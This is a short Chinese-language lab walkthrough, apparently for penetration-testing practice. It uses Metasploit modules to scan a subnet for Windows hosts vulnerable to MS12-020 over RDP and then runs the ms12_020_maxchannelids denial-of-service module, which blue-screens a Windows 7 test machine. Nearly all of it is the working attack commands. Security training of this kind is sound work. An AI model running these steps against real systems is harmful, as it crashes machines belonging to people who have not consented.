测试环境(kali:192.168.189.7 win7:192.168.189.6)
use auxiliary/scanner/rdp/ms12_020_check
set RHOST 192.168.189.0/24(由于这个攻击需要靶机开启3389,所以我们的port默认是3389不要动,rhosts由于后面有s,所以很容易明白这可以设置成一个网段,也可以是一个ip,知道ip是更快的。为了更普遍,我们设成一个网段,这里时间较久,由于我的靶机是192.168.189.6所以输入set RHOSTS 192.168.189.0/24)
show options
run
我们可以看到它已经再开始查找了,我们发现192.168.189.6前面是绿色的+,这是开启的意思。use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST 192.168.189.6
run
(靶机已经蓝屏了)